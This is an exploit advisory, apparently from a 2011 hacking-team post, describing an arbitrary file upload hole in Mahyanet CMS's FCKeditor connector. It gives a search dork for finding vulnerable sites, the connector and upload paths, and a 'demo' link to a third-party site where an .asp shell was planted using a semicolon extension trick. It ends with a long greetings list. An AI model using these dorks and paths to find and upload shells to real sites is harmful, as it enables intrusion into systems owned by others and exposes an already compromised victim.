Mahyanet CMS Shell Upload

`  
--------------------------------------------------------------------------------  
@ Mahyanet Cms (FCKeditor) Arbitary File Upload Vulnerability  
--------------------------------------------------------------------------------  
--------------------------------------------------------------------------------  
@ Name: Mahyanet Cms (FCKeditor) Arbitary File Upload Vulnerability  
@ Vendor: http://mahyanet.com  
@ Date: 2011-07-04  
@ Author: Ashiyane Digital Security Team  
@ Thanks to: 1337day.com,Securityreason.com,packetstormsecurity.com,Exploit-db.com  
@ Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com  
@ Home: www.ashiyane.org/forums/  
--------------------------------------------------------------------------------  
--------------------------------------------------------------------------------  
[+] Dork: intext:"Powered by : Mahyanet.com"   
--------------------------------------------------------------------------------  
--------------------------------------------------------------------------------  
[+] Vulnerabilities ~>  
  
[+] Vulnerability: http://127.0.0.1/Mahyanet/fckeditor/editor/filemanager/connectors/test.html  
  
[+] Uploaded Path: http://127.0.0.1/Mahyanet/fckeditor/editor/images/userfiles/file/[Your File]  
  
[+] Demo : http://www.tanhadairy.com/fckeditor/editor/images/userfiles/file/he.asp;(1)(1).txt  
--------------------------------------------------------------------------------  
===========================================================================  
@ Gr33tz:  
@ Ashiyane Members :  
@ BehroozIce,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04  
@ Taghva,M3QD4D,PrinceOfHacking,Hidden-Hunter,Root3r,elvator,unique2world  
@ Gladiator,Wahid,Encoder,mmilad200,n3me3iz,Classic,r3d.z0n3,injector,fr0nk  
@ mzhacker,zend,milad-bushehr,aliakh,__amir__,anti206  
@ 1337 Member:   
@ r0073r,Side^effects,r4dc0re,eidelweiss,SeeMe,agix,gunslinger  
@ Sn!pEr.S!te,indoushka,Knockout,ZoRlu,AnT!-Tr0J4n,eXeSoul,  
===========================================================================  
<<./By XroGuE >>   
`